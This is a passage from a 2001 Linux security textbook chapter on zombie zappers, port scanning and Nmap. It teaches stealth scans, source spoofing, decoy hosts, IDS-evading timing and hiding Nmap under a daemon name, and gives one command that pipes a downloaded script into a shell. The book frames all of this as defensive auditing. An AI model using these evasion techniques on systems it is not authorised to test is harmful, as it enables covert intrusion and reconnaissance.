+suspect that your system is acting as a zombie,and you wish to quickly disable +the illicit zombie server (that is,stop it from generating the DOS packets) +without shutting down your entire system. +Rather than trying to learn how to use,say,the Tfn2k client,you can use a +zombie zapper to shut down the zombie.However,you should understand that +most zombie zappers are somewhat limited in what they can do: +(cid:2) Zombie zappers are programmed to shut down only certain DDoS +servers.If a malicious user has created a new one that uses a different +port,your zombie zapper will likely not work. +(cid:2) If the malicious user has changed the password of the illicit server that +has turned one of your hosts into a zombie,then it is likely that your +zombie zapper software will not work.For example,the installation +process for Tfn2k requires the malicious user to create a new password. +Thus,most zombie zappers won’t work against this product.Still,zombie +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 125 +System Scanning and Probing • Chapter 3 125 +zappers are useful for other DDoS servers,because most people who +install them are either relatively inexperienced,or are in too much of a +hurry to change the password. +(cid:2) If you try to use a zombie zapper against a remote computer,it is pos- +sible that a firewall that lies between you and the remote computer will +block the packets you send.DDoS attacks have been widely publicized, +and many systems administrators have created firewall rules that will +block out all DDoS traffic,including that sent by your application. +(cid:2) Because DDoS attack servers spoof packets,you may be using your +zombie zapper against the wrong host. +(cid:2) Your attempt to disable a zombie computer on someone else’s network +may be misconstrued as an attack—you may get some interesting calls +from that system administrator. +When Should I Use a Zombie Zapper? +In spite of the reasons why you should be careful,installing and using a zombie +zapper is useful in a number of situations.You can configure your intrusion +detection service (IDS) devices to automatically run a zombie zapper against an +offending system.This way,the problem is automatically solved.You will learn +about how IDS applications and firewalls can respond automatically to threats in +Chapters 9 and 11. +If you notice large amounts of unknown traffic when you monitor your net- +work or network perimeter,you can use a zombie zapper against the host or +hosts generating this traffic.Chapter 4 will show you how an IDS application can +help you scan for problem traffic.In Chapter 5,you will learn how to use packet +sniffers to check the complexion of traffic on your LAN. +You should understand that although DDoS attacks are not new,it is likely +that they will continue.After all,the Melissa,I Love You,and Anna Kournikova +e-mail viruses are all very similar to the 1989 Robert Morris worm attack (the +first large-scale attack of Internet connected servers). +What Zombie Zapper Should I Use? +Many different utilities exist for disabling zombies.You can learn about these at +various sites,including http://packetstorm.securify.com,by doing a search for +zombie and zapper.One of the more useful utilities is Zombie Zapper,available at +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 126 +126 Chapter 3 • System Scanning and Probing +the Bindview site (www.bindview.com).As of this writing,the URL is +http://razor.bindview.com/tools/ZombieZapper_form.shtml.The utility is also +available on the CD accompanying this book (zombie-1.2.tgz). +Zombie Zapper Commands +When compiled,Zombie Zapper is designed to be run by using the ./ com- +mand.If you enter ./zz without any arguments,you will receive the following: +./zz +Zombie Zapper v1.2 - DDoS killer +Bugs/comments to thegnome@razor.bindview.com +More info and free tools at http://razor.bindview.com +Copyright (c) 2000 BindView Development +=== You must specify target(s) or a class C to send to +USAGE: +./zz [-a 0-5] [-c class C] [-d dev] [-h] [-m host] [-s src] [-u udp] +[-v] hosts +-a antiddos type to kill: +0 types 1-4 (default) +1 trinoo +2 tfn +3 stacheldraht +4 trinoo on Windows +5 shaft (requires you use the -m option) +-c class C in x.x.x.0 form +-f time in seconds to send packets (default 1) +-d grab local IP from dev (default eth0) +-h this help screen +-m my host being flooded (used with -a 5 above, only one host) +-s spoofed source address (just in case) +-u UDP source port for trinoo (default 53) +-v verbose mode (use twice for more verbosity) +host(s) are target hosts (ignored if using -c) +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 127 +System Scanning and Probing • Chapter 3 127 +Table 3.2 provides a brief overview of some of the more common commands. +Table 3.2 Common Zombie Zapper Commands +Command Definition +-a Allows you to specify the address to where you will send +the packets. +-c You can specify an entire class C address when sending +stop packets. +-s Allows you to spoof your own address. This and the -u +option allow you to defeat some firewall rules when trying +to disable zombies on remote networks. +-u Allows you to change the default UDP port for sending +stop packets. +0-5 Each number enables Zombie Zapper to imitate a specific +DDoS client. If, for example, you think you have found a +tfn client, you would issue a command with the number 2 +in it. +What Does Zombie Zapper Require to Compile? +You will need the following to install Zombie Zapper: +(cid:2) A standard Linux system. +(cid:2) Libnet This set of supporting libraries allows your system to generate +packets for use on a network.You need these libraries because the cre- +ators of Zombie Zapper used them in development,and the program will +not compile properly unless you have them installed on your system. +These libraries are popular,and are often used by other developers.You +can download the Libnet libraries at www.canvasnet.com/libnet. +Exercise: Using Zombie Zapper +1. Obtain the Zombie Zapper source code from the accompanying CD or +at www.bindview.com.Once you have unzipped and untarred the file +using the tar -zxvf command,you are ready to compile.See the pre- +ceding URLs for obtaining Zombie Zapper. +Before you can compile this code,you must first obtain and install +the Libnet libraries.A version of Libnet (libnet-0.10.8.tar.gz) is available +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 128 +128 Chapter 3 • System Scanning and Probing +on the accompanying CD.Once you have obtained Libnet,unzip and +untar it using the tar -zxvf command.The ./configure script will install +Libnet into the directories appropriate to your system. +2. Install Libnet by changing to the Libnet.x.x directory,and then using the +configure script: +./configure +3. When the configure script is finished,type make. +4. Type make install. +5. Although optional for installing Zombie Zapper,you can now install the +supplemental and utility libraries by typing make supp and then make +util. +6. Now that you have installed Libnet,you can compile Zombie Zapper. +Because the code for Zombie Zapper relies on this library,you must tell +the GCC compiler that the Libnet library exists.Issue the following +command: +gcc ‘libnet-config -defines‘ -o zz zz.c -lnet +7. This command tells the GCC compiler to use the libnet-config file, +which is found in the /usr/bin/ directory for most Linux systems.You +will not have to edit this file.When you type this command,make sure +that you use the “backtic”character,which is the character above the +TAB key on your keyboard.Do not use an apostrophe.If you do not use +the backtic character,GCC will not search for libnet-config,and Libnet +will give you a message informing you that you need to define some +values in the libnet-config script.Ignore this message,and type the cor- +rect character. +8. Now that zz is compiled,you can use it.Issue the following command: +./zz +9. You will see a Help menu informing you how to use the program.This +confirms that you have compiled the program correctly. +10. Now,suppose that you notice that your internal network of 192.168.5.0 +has several hosts on it that are sending tfn packets.As long as the tfn server +is using a default password,the following command will stop the server: +./zz -c 192.168.5.0 +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 129 +System Scanning and Probing • Chapter 3 129 +11. The servers that a malicious hacker has turned into zombies on this par- +ticular class C subnet should stop immediately.You cannot use the -c +command with class A or class B network addresses.To do this,you +would have to specify the IP address,along with the type of server you +wish to shut down.For example,if you suspected the server at +207.192.45.2 to be attacking you with the stacheldraht DDoS server, +you would issue the following command: +./zz -a 3 207.192.45.2 +12. To learn more about the nature of the packets you are sending,you can +use the -vv command: +./zz -a 3 -vv 207.192.45.2 +13. If you wish to spoof your own address so that the malicious user can’t +learn who deactivated his or her zombies,you would use the -s com- +mand,followed by an IP address of your choosing: +./zz -a 3 -vv 207.192.45.2 -s 10.1.2.3 +Scanning System Ports Using the +Gnome Service Scan Port Scanner +Gnome Service Scan (GSS) is a simple port scanner.It is quite fast,and has a GUI +interface.It is also easy to install,and uses the same libraries as the Gnome (that is, +Ximian) desktop.The main GserviceScan window is shown in Figure 3.10. +You can download the source code for GSS at www.gnome.org/applist/ +view.php3?name=Gnome%20Service%20Scanner.The Preferences section,shown +in Figure 3.11,allows you to further customize GSS. +Setting longer TCP and UDP timeout values may ensure that you obtain +results that are more accurate.Longer timeout values,however,mean longer, +more time-consuming scans,so strike a balance.A good idea would be a default +of 7 and 10 seconds for the TCP and UPD timeout values,respectively.In addi- +tion,if your network is experiencing DNS problems,you can disable DNS so +that you at least learn the IP address and the open ports of the remote host. +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 130 +130 Chapter 3 • System Scanning and Probing +Figure 3.10 The Main GserviceScan Screen +Figure 3.11 Customizing GSS +Required Libraries +To install GserviceScan,you must have the Gnome desktop installed,complete +with all packages from the www.gnome.org site.If you don’t have Gnome +installed,log on to your Linux system and issue the following command: +lynx -source http://go-gnome.com/ | sh. +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 131 +System Scanning and Probing • Chapter 3 131 +Of course,you can install the appropriate RPMs from the Red Hat distribu- +tion CDs.However,if you install Gnome from the Gnome site,the latest Gnome +updates and features become available to you. +This command tells Lynx,a text-based Web browser,to contact the http:// +go-gnome.com site and download a shell program.After the small program down- +loads,a graphical wizard will guide you through the rest of the process.You can +customize the packages you wish to install;you do not have to install the packages +relating to software development.You can then install the GSS by obtaining the +gservicescan-0.8.tar.gz file from the accompanying CD,or from the Gnome home +page (www.gnome.org),which will have the latest version. +NOTE +The command for checking for the presence of an RPM is rpm -qa | +grep text_string, where text_string is part of the package name for +which you are searching. +Why Use a Port Scanner? +Systems administrators find port scanners useful when auditing their own sys- +tems.Although a simple port scanner such as GSS does not actually test for flaws +in binaries and Web applications,a good port scanner can help you isolate which +ports are open,and then take any action that is necessary. +Port scanning a machine may set off an alarm for the system’s administrator, +who might take a dim view of your actions.Be extremely careful using any of +the applications in this chapter.Improper use of these applications could lead to a +strong reprimand,dismissal,or telephone calls from irate systems administrators. +You should conduct port scans only on systems that you administer.Even then, +you should scan them only if you have explicit permission,as your scan can set +off triggers and alerts that can cause many people a great deal of work.Unless +you have explicit (sometimes,even written) permission from the system adminis- +trator,you may cause a serious violation of your security policy. +Exercise: Using Gnome Service Scanner +1. If necessary,open the Lynx browser and issue the command given earlier +to download and install the necessary Gnome libraries.If you do not +have Lynx installed,download it from www.rpmfind.net. +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 132 +132 Chapter 3 • System Scanning and Probing +2. In the Start Address field,enter the beginning host IP address for your +particular network or network segment. +3. In the End Address field,enter the last host IP address of this network or +network segment.Remember,you should not conduct port scans on +systems that are not yours. +4. In the Protocol section,make sure that the TCP button is selected. +Using the arrow,select 110 (the port for POP3 e-mail). +5. Click Scan.You will see a list of several hosts,some of which will have +open ports.See Figure 3.12. +Figure 3.12 Viewing Gnome Service Scanner Results +You now know that various hosts in your network are up (“Connection +refused”),which are not responding (“No route to host”),and which are acting +as POP3 e-mail servers. +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 133 +System Scanning and Probing • Chapter 3 133 +Using Nmap +Nmap is an advanced port scanner.It is also capable of identifying the version +of an operating system.You can download Nmap,shown in Figure 3.13,at +www.insecure.org.Perhaps the best thing about Nmap is that its developer, +Fyodor,is extremely talented,active,and a good collaborator.He and his col- +leagues update Nmap often,and the updates usually bring desirable new features +and improvements. +Figure 3.13 Nmap +Tools & Traps… +Nmap: A Tool for Hackers or Security Professionals? +You may be wondering whether Nmap is actually a “hacker tool” meant +to help compromise the security of a network. Nmap was first intro- +duced as a hacking tool, but has been quickly adopted by IT profes- +sionals. It provides excellent information concerning hosts on your +network. It also allows your IT professionals to: +(cid:2) Audit your network Using this application, your employees +can quickly scan a network for hosts that have unsecured +ports. +Continued +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 134 +134 Chapter 3 • System Scanning and Probing +(cid:2) Test firewall configurations Nmap will help to ensure that +the firewall blocks as many packets as it can, without com- +promising your ability to communicate with the outside +world. +(cid:2) Identify the nature of suspicious remote systems +Although scanning a host that has scanned you may be con- +sidered bad etiquette, doing so can help your employees +quickly size up a threat. +(cid:2) Test your router and switch configuration TCP/IP has built- +in testing features that allow one echo request to cause an +entire network of hosts to respond to a host. While this fea- +ture may be useful in determining if all hosts can traverse the +default gateway, it can also have disastrous effects if +exploited by a malicious user. Using readily available soft- +ware, a malicious user can use your network to attack other +networks. +While it is true that you would not want any stranger to use Nmap +against your hosts, it is a valuable tool in the hands of someone +who knows how to use the information it presents to help secure your +network. +Isn’t Nmap Just Another Port Scanner? +Nmap is essentially a network host scanner,like GSS.However,it has additional +features that make it the most popular Unix-based scanner,including: +(cid:2) Fast ping and port scan capabilities You can find out if systems are +up,and what ports are open. +(cid:2) Operating system fingerprinting Nmap has the ability to guess the +operating system of the host it is scanning.Although Nmap must make a +guess,it is a very well informed one.This is because Nmap contains an +extensive database of TCP-,UDP-,and IP-based responses from hun- +dreds of different operating systems.Nmap can query your system,and +then compare its responses to this database.Vendors are required to make +their versions of TCP/IP compliant to technical specifications found in +documents called Request for Comments (RFCs).These files are avail- +able at various places on the Internet,including www.faqs.org/rfcs/ +index.html.However,each vendor implements TCP/IP in a slightly +www.syngress.com + +138_linux_03 6/20/01 9:35 AM Page 135 +System Scanning and Probing • Chapter 3 135 +different fashion,and Nmap is able to compare these differences and +then inform you about the operating system. +(cid:2) Sequence prediction All TCP-based communications require each +system to establish a pattern to which it will conform when sending +TCP packets.This pattern is established during the three-way TCP +handshake.Nmap is able to determine elements of this pattern.In some +systems,such as all versions of Windows NT 4.0 before Service Pack 5, +these sequences are not sufficiently randomized,and are easy to predict. +In the past,hackers have been able to identify such simple TCP +sequences,and use them to hijack connections.Nmap provides this +information.Most Internet-ready operating systems,such as modern +versions of Linux,have truly random sequencing,and are much more +difficult to predict. +(cid:2) Ability to imitate all different aspects of a TCP-based connec- +tion When a TCP connection begins,it takes some modest amount of +time (a few milliseconds) to establish the connection,a process called the +handshake.Many firewalls are configured to drop initial SYN packets for +certain systems,because network administrators do not want anyone in +the outside world to establish contact to the system (without going +through a firewall).Most scanners use the SYN packet,and will thus be +dropped.Nmap is able to generate packets that many firewalls will allow, +and thus Nmap can traverse through a firewall to map remote hosts and +networks. +(cid:2) Spoofing features Many network administrators will try to learn +exactly who conducted a scan of their network.Using Nmap’s spoofing +feature,it is possible for a malicious user to imitate another host. +Consequently,the systems administrator may be led to believe that some +innocent third party initiated a scan;IT professionals can use the +spoofing feature to test firewall configurations. +(cid:2) The ability to control scan speed and sequence Many Intrusion +Detection System (IDS) applications will generate alerts if they notice +that a network’s hosts are being scanned sequentially.An IDS will also +report an attack if it notices that a series of hosts has been scanned +quickly.Using Nmap,you can slow an attack.Whereas a malicious user +would use Nmap to thwart security,IT professionals can use it to help +audit a firewall. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 136 +136 Chapter 3 • System Scanning and Probing +(cid:2) The ability to save output to text files This feature makes it pos- +sible to use Nmap output in other programs,or to save output for future +reference. +(cid:2) The ability to read input information from text files This feature +makes is possible to read input information from text files. +Acquiring and Installing Nmap +Nmap is self-contained,and can thus be run on many Unix systems.Generally, +installing the RPM is more reliable than the tarball on Red Hat systems.In this +particular case,there are no compilation options as of yet,so there is no reason not +to use the RPM file if your distribution supports it (available on the CD accom- +panying this book:nmap-2.53-1.i386.rpm).You can verify your installation with: +rpm -qa | grep nmap +Common Nmap Options +One of the exciting things about Nmap is its sheer versatility.You can use it as a +basic port scanner for a system on your internal network,or you can have it +identify the operating system version of a remote system on another firewall-pro- +tected network.You can use it to run a single scan,or use it in interactive mode +to run multiple scans from the same system at the same time. +The two scan options given in the next section are common in various scan- +ning applications.However,they are less effective because many firewalls are con- +figured to reject a SYN connection that is first initiated from the outside world. +These scans will also appear on the logs of your firewall or IDS applications: +(cid:2) P0 By default,Nmap sends an ICMP message to each remote host.This +option turns off this default behavior.This option is useful when scan- +ning systems that do not appear to be up,because they do not respond +to ICMP ping packets.If you use this option,you should understand +that the information Nmap provides may not be accurate. +(cid:2) -sP Has Nmap use only ICMP to conduct a standard ping scan.Nmap +options preceded with the -s option are considered “stealth”options that +help Nmap conduct less obvious scans. +(cid:2) -PT Tells Nmap to use a TCP packet to ping the host instead of an +ICMP packet.This option is useful when testing a firewall to see if it can +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 137 +System Scanning and Probing • Chapter 3 137 +block both ICMP and TCP packets intelligently.When you use the -PT +option,Nmap will send out a TCP ACK packet,and then wait for hosts +to send back an RST packet.Many firewalls will allow ACK and RST +packets to traverse the firewall,and thus you can scan the entire network. +(cid:2) -sT Conducts a full TCP connection to each port on the remote +system. +(cid:2) -sS Uses the SYN feature of TCP.When TCP begins a connection,it +will send a SYN packet to the remote host to tell it to begin a connec- +tion.When Nmap sends a SYN packet,it essentially creates a half-open +connection.Even if the remote computer doesn’t want to communicate +with your host,Nmap is still able to gather sufficient information from +this scan to learn the open ports. +(cid:2) -0 Tells Nmap to guess the operating system version.This is a much- +touted feature of Nmap,because it allows illicit users to quickly deter- +mine the type of operating system in use so that they can then research +vulnerabilities associated with it.Nmap uses a database of operating +system signatures.Once the application conducts the scan,it compares +the information it obtains from the scanned host and compares it to its +database.The creators of Nmap spend a great deal of time trying to keep +this feature as up to date as possible by making sure that Nmap’s signa- +ture database is current.One of the ways that Nmap accomplishes oper- +ating system guessing is that it understands how each particular +operating system implements specific TCP/IP applications. +(cid:2) -v Has Nmap go into verbose mode so that you can gain more infor- +mation about what Nmap is pumping out to a remote host,and what +the remote host is sending back.If you specify -v -v,Nmap will give +you even more information,depending on your scan. +Applied Examples +Suppose you just want to conduct a ping scan of your local network to see what +hosts are currently up.Suppose further that your network address is 10.100.100.0 +with a subnet mask of 255.255.255.0.You would issue the following command: +nmap -sP 10.100.100.0/24 +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 138 +138 Chapter 3 • System Scanning and Probing +If you add the -v option,you will also see a list of systems that are down. +Using the -sT option is useful when pinging remote hosts over routers or fire- +walls that do not allow ICMP packets. +The following command will conduct a “half open”TCP scan,give you +Nmap’s best guess concerning the operating system,and not ping the host +beforehand: +nmap -sS -O -P0 host. +If you specify the -v option,you will see further details concerning how +Nmap operates. +Scanning Entire Networks and Subnets +If you want to scan an entire network,Nmap supports wildcards and Classless +Internet Domain Routing (CIDR) notation.Nmap uses the standard wildcard of +“*.”.CIDR notation is where you use /24 to indicate a standard class C subnet +mask of 255.255.255.0,which indicates that we want 24 bits of subnet mask +starting from bit 1.The remaining 8 bits are used as the node number for our +network.The 172.16.0.0/18 subnet uses 2 bits of subnet mask to divide the +single class B network number (172.16) into four additional,separate subnets +(172.16.0,172.16.64,172.16.128,and 172.16.192).Each subnet would then have +14 bits of node number addressing: +nmap -P0 -oN output.txt 172.16.0.0/18 ."*.*" +nmap -P0 -oN output.txt 192.168.0.0/24 +You should use quotation marks around wild cards,such as those used in the +preceding code.Otherwise,Linux may interpret the commands as the filename +wildcard,resulting in the rewriting of any files in the current directory that +match the pattern.You can also use single quotes,if you wish. +These commands would scan all of the hosts,making sure to save the results +in the file named output.txt.Using CIDR notation allows you to scan networks +that use custom subnet masks.For example,suppose that you have a network +address of 172.16.0.0/8,and a subnet mask of 255.0.0.0.To properly scan this +subnet,you would use the following command: +nmap -P0 -oN output.txt 172.16.0.0/8 +The 172.16.0.0/18 subnet uses 2 bits of subnet mask to divide the single +class B network number (172.16) into four additional,separate subnets (172.16.0, +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 139 +System Scanning and Probing • Chapter 3 139 +172.16.64,172.16.128,and 172.16.192).Each subnet would then have 14 bits of +node number addressing. +Selective Scanning +Suppose,now,that you want to scan only certain ports on the hosts that belong +to an entire subnet.Doing this can help you selectively scan for only a specific +service on a network,such as a Web and DNS server,as shown here: +nmap -sX -p 22,53 -oN syngress.txt 192.168.0.0/24 +NOTE +The following operating systems do not respond accurately to “Xmas” +scans, because they do not follow standard RFCs: +Microsoft +CISCO +All BSD systems that are not FreeBSD or NetBSD +IRIX +HP/UX +Adding More Stealth +You have already seen how Nmap is capable of manipulating aspects of TCP to +hide its scans from firewalls.Additional stealth options include: +(cid:2) -sF Using a TCP packet with the FIN bit sent,Nmap can send out +packets to all ports on a host. +(cid:2) -sX Called the “Xmas Tree”packet argument,if you specify this argu- +ment,the FIN,URG and PUSH flags will all be set. +(cid:2) -sN Called the “Null scan,”this argument turns off all flags,sending out +an essentially empty bit.If the system responds,Nmap knows that the +host is up,and can deduce information it derives from the remote +system’s return packet.Microsoft systems do not reply to this packet,and +if you are careful in your network scans,you can use Nmap to help dis- +tinguish Microsoft systems from all others. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 140 +140 Chapter 3 • System Scanning and Probing +(cid:2) -D This option allows you to specify several additional hosts who will +appear as originators of the scan.Hackers often use this option to con- +fuse systems administrators,who will usually not be able to tell from +where the scan truly came.As a systems administrator,you can use it to +test your intrusion detection systems and firewalls to see how well they +find and log all scans of your network.When using the -D option,you +would separate each bogus host with a comma: +nmap -sF -v 192.34.35.0/24 -D bogushost1, bogushost2, +bogushost3 +If you specify the ME option,you will increase the likelihood that +your system will be hidden from all IDS logs. +To scan the 192.15.3.10/24 network protected by a firewall that denies all +SYN packets,issue the following command: +nmap -sF -v 192.15.3.0/24 +The following command would conduct the same scan and specify bogus +scanning hosts: +nmap -sF -v 192.15.3.0/24 -D www.yourwebserver.com,www +.yoursecondwebserver.com,www.yourftpserver.com,ME,www +.youre-mailserver.com +As you use Nmap,experiment with the -sX and -xN arguments to see if +they are useful in your particular situation.It is important to understand that you +can specify only one TCP option at a time.This means that you cannot use both +the -sF and -sS arguments in the same command. +Saving to Text and Reading from Text +You may have already noticed that some of these scans can be quite lengthy.For +example,if you do a detailed scan of all ports on an entire network of 253 hosts, +you may not be able to see all of them on your display,no matter how long you +can scroll your terminal.Nmap provides the following options to save output +into a text file: +(cid:2) -oN filename Places the scan results in a text file that you can read +later. +(cid:2) -oM filename Places the scan into machine-readable format.If,for +example,you scan a network,you can then use this file with another +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 141 +System Scanning and Probing • Chapter 3 141 +application,such as Cheops or an IDS to generate a network map. See +later in this chapter and Chapter 4 for more information. +(cid:2) -iL Allows Nmap to read information from a text file.For example,if +you already have a text file that contains the IP addresses or host names +of a text file,you can specify this filename rather than an IP or host +range. +For example,if you wished to save Nmap output into a file named file.txt, +you would issue the following command: +nmap -v -oN file.txt -O host.yourcompany.com +Testing Firewalls and Intrusion Detection Systems +You may wish to use Nmap in a network that uses a well-configured firewall or +an IDS).If so,you may want to conduct scans that cannot be easily detected,or +are actually able to traverse a firewall without being blocked.The following +options are effective in these cases: +(cid:2) -f Has Nmap break up its scans into smaller IP packets.This way,a fire- +wall will not be able to capture and log the packets as easily. +(cid:2) -S Address Allows you to specify the originating address of the scan. +Originally meant to allow Nmap to work with various operating sys- +tems that would not report the IP address to Nmap,it is possible to use +this feature to spoof the source address of the scan.Generally,if you use +this argument to spoof the source of the attack,you will also need to use +the -e -P0 options.The -e option allows you to specify the interface to +use (usually eth0).The -P0 option,as you have already learned,tells +Nmap not to conduct a ping scan.The -D option is quite similar to this +option,as it provides disinformation to any target host that may be +recording your scan. +(cid:2) -g port By default,Nmap will open an ephemeral port (i.e.,one above +1024) to begin a scan.Many firewalls are configured to block these +ports.However,firewalls are often configured to allow incoming traffic +through certain well-known port address (such as ports 80,110,53).By +specifying a port the firewall allows,you (or a malicious user) can find a +way through the firewall to conduct your scans. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 142 +142 Chapter 3 • System Scanning and Probing +Example: Spoofing the Source Address of a Scan +Suppose that your system actually has the IP address of 192.168.3.4,but you wish +all of the Nmap packets your system issues to be marked with the IP address of +20.20.20.20.You would issue the following command against a system named +sandi: +nmap -S 20.20.20.20 -e eth0 -P0 -sS -v sandi +The -P0 (no ping) and -sS (TCP SYN stealth port scan) enable Nmap to con- +duct a TCP-based scan that does not first send out a ping packet.The -sS option +helps the scan get past firewalls,which will often filter out initial SYN packets. +To have your system use port 53 to originate packets to conduct the same +scan,you would issue the following command: +nmap -g 53 -S 20.20.20.20 -e eth0 -P0 -sS -v sandi +Timing Your Scan Speeds +Many intrusion detection systems will send alerts if a large scan occurs.You can +use Nmap to test these IDS applications by using the -T argument,which allows +you to have Nmap wait a certain interval between sending packets.The idea +behind this option is that if a scan is spread out over time,the IDS will not be +able to find it as quickly.This argument takes six options: +(cid:2) paranoid Has Nmap send a packet only after five minutes have passed. +You can specify the number 0,instead of paranoid,if you wish. +(cid:2) sneaky Nmap will wait 15 seconds to send another packet.You can +specify the number 1,instead of sneaky,if you wish. +(cid:2) polite Waits 0.4 seconds to send packets.You can specify the number 2, +instead of polite,if you wish. +(cid:2) normal The default setting that has Nmap send another packet as soon +as the target host sends a reply.You can specify the number 3,instead of +normal,if you wish. +(cid:2) aggressive and insane These options actually speed up the scan,and +are useful only if you want to conduct quick ping and port scans.Be +careful with these settings,as they may negatively affect network perfor- +mance by generating a large amount of network traffic.Numbers 4 and +5 represent aggressive and insane,respectively. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 143 +System Scanning and Probing • Chapter 3 143 +Example: Conducting a Paranoid Scan +To conduct a paranoid scan against a host,you would issue the following +command: +nmap -S 20.20.20.20 -e eth -P0 -sS -v -T paranoid sandi +Remember however,that this scan will take some time to complete,because +the paranoid setting has Nmap wait five minutes between sending packets. +NOTE +As you run Nmap, you may find that it takes considerable time to com- +plete the scan. Usually, this is because some of the options you specify +may cause Nmap to wait for some time before it can process the packets +it generates. Sometimes, the scan is slowed by the firewalls or routers +that exist between you and the host you are scanning. If you use mul- +tiple arguments, or scan multiple remote systems, you may find that the +scan will take several minutes to complete. +Exercise: Using Nmap +1. Copy nmap-2.53-1.i386.rpm from the accompanying CD,or go to +www.insecure.org and download the Nmap RPM. +2. Install the RPM using the following command: +rpm -ivh RPM_File +3. Now,issue the following command to a system running any Microsoft +product: +nmap -O -sS host +You should see a list of the open ports,as well as Nmap’s guess con- +cerning the operating system.Now,issue the same command on a Linux +system.You will see a listing of the open ports,as well as a guess con- +cerning the system kernel.Notice that it will not return information +concerning whether this system is a Red Hat or Caldera system.This is +because Nmap focuses on the kernel used,rather than any other feature. +Now,save your query into a log file: +nmap -O -sS host -v -oN file.txt hostname +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 144 +144 Chapter 3 • System Scanning and Probing +4. You will see that the scan is reported to standard output,as well as sent +to the text file.Open file.txt to view your scan.Now,use Nmap to issue +a ping scan of your entire network,but also have Nmap spoof the source +IP address. +5. Although this will take some time,use the Nmap paranoid feature to +conduct a scan of a host.Be prepared to come back after several hours +to view the results. +Using Nmap in Interactive Mode +Thus far,you have used Nmap to issue single commands.Nmap’s “interactive +mode”allows you to do two things that you should be aware of as a systems +administrator: +(cid:2) It can conduct multiple Nmap sessions/. +(cid:2) It can disguise the fact that it is running on your system.Using the +“spoof”feature,it is possible to make Nmap appear as an innocuous +program,such as vi,or a daemon such as named (for DNS) or sendmail. +To run Nmap interactively,you would issue the following command: +nmap --interactive +You will then see the following command prompt:nmap>. From here,you +can issue Nmap commands.Figure 3.14 shows a sequence where the user starts +Nmap,issues a simple scan of the entire 192.168.2.0/24 network,and then scans +a system named Jacob.Notice how both requests go into the background,and +that the second request finishes after the first request.All of these questions are +answered later. +Consider the usefulness of interactive mode when using the paranoid flag. +You could,for example,issue several paranoid scans that could take days to com- +plete.You could walk away,and then return and read the text file after the scan is +complete.Because such scans can take several days to complete,it has become +necessary for hackers to try to hide the process that spawns these scans.As a sys- +tems administrator,you would likely not use this feature.However,you should be +aware that seemingly benign processes may,in fact,be instances of Nmap. +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 145 +System Scanning and Probing • Chapter 3 145 +Figure 3.14 Viewing Nmap’s Interactive Mode +Exercise: Using Nmap in Interactive Mode +1. Begin an interactive Nmap session: +nmap --interactive +2. Scan a remote system using the following command: +nmap> n -sF -O -v hostname +3. You will see that this scan did not go into the background.This is because +you did not use the f command.Do so now,making sure to save your +scan into a text file (otherwise,you will not be able to view the scan): +nmap> f -sF -O -v hostname -oN scan.txt +4. You should immediately see the prompt again and a PID number,such +as [PID:9034].Just about as quickly,you will notice that this process fin- +ishes.This is because you launched a scan as a background process,and +this background process is complete.Open a second terminal to view +the scan.txt file.Close the file when you are finished. +5. Now,issue the following command to begin a paranoid scan of the same +host.This time,disguise this scan as a process named /var/syngress: +nmap> f -spoof "/"/var/syngress" " -sF -O -v hostname -oN -T 0 +scanparanoid.txt +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 146 +146 Chapter 3 • System Scanning and Probing +6. Now,go to the second terminal and issue the following command: +ps aux | grep syngress +7. You will see that the syngress process is running;actually,it is the Nmap +scan taking place.You just as easily could have named this process named, +httpd,sendmail,or any other daemon.As a systems administrator,consider +the usefulness of carefully documenting the role of each of your servers so +that if you see a suspicious service running,you can shut it down. +Now that you are familiar with Nmap,consult the Nmap man page,as well as +additional information at www.insecure.org. +Using NmapFE as a Graphical Front End +You are not limited to a command-line interface.The Nmap Front End (NmapFE) +provides a well-written,stable GUI that allows you to control almost every aspect +of Nmap.You can download NmapFE at www.insecure.org.It is available in both a +tarball and an RPM (the RPM is available on the CD accompanying this book: +nmap-frontend-0.2.53-1.i386.rpm).As with Nmap,the latter works best in Red +Hat systems.Figure 3.15 shows the NmapFE interface after it has issued a FIN +Stealth scan,in fast mode,using only a TCP ping that has been fragmented. +Figure 3.15 The NmapFE Interface +www.syngress.com + +138_linux_03 6/20/01 9:36 AM Page 147 +System Scanning and Probing • Chapter 3 147 +Exercise: Using NmapFE +1. Copy nmap-frontend-0.2.53-1.i386.rpm from the accompanyiong CD, +or go to www.insecure.org and download the latest stable version of +NmapFE. +2. Install it using the rpm -ivh command. +3. The GUI is quite intuitive.Issue commands at will.Notice,however, +that although you can specify decoys and fragment,you cannot specify +paranoid scans. +NOTE +You should note, however, that this interface is somewhat unstable, and +given to faults that lead to complete crashes (core dumps). This is espe- +cially the case in systems that have been upgraded (say, from Red Hat +version 7.0 to 7.1). It is possible that upgrades create conflicts in some +of the supporting libraries. +Using Remote Nmap as a +Central Scanning Device +Thus far,you have used your local copy of Nmap to scan remote systems.Remote +Nmap (Rnmap) enables a client system to connect to a central Nmap server. +Developed by Tuomo Makinen,it is designed to allow network administrators a +central Nmap source that is easy to administer and update.It is currently in beta, +but both the client and the server are quite strong.Rnmap has the following +features: +(cid:2) User authentication +(cid:2) A command-line and GUI client +(cid:2) Available encryption (still in beta form) +You can download Rnmap from http://rnmap.sourceforge.net.Rnmap is +written in the Python scripting language,which means that your Linux system +must have Python installed.Standard installations usually have Python installed, +but you can check for its presence using the following RPM command: +rpm -qa pyth +www.syngress.com + +138_linux_03 